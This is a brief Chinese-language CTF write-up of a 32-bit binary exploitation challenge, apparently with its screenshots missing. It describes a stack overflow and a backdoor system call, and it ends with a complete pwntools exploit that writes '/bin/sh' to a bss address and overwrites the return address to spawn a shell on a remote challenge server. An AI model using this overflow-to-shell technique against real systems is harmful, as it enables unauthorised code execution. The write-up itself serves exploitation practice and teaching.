file结果如下:
32位ELF文件
checksec结果如下:
ida反汇编,main函数如下:
查看hello函数:
name位于bss段,位置已知
s存在栈溢出漏洞
发现存在pwn函数,内容如下:
存在后门函数
所以我们可以在name里输入"/bin/sh",然后调用system函数传入参数name即可
NOTE:32位传参都是从右向左压入栈中,且saved registers和return address都是4个字节
name地址如下:
system函数地址如下:
则exp如下:
from pwn import * #io = process('./pwn') #io = gdb.debug('./pwn', 'b main') io = connect('220.249.52.133', 43492) name_addr = 0x0804A080 system_addr = 0x0804855A io.sendlineafter('name', '/bin/sh') payload = b'a' * 0x2a + p32(system_addr)+p32(name_addr) io.sendlineafter('here:', payload) io.interactive()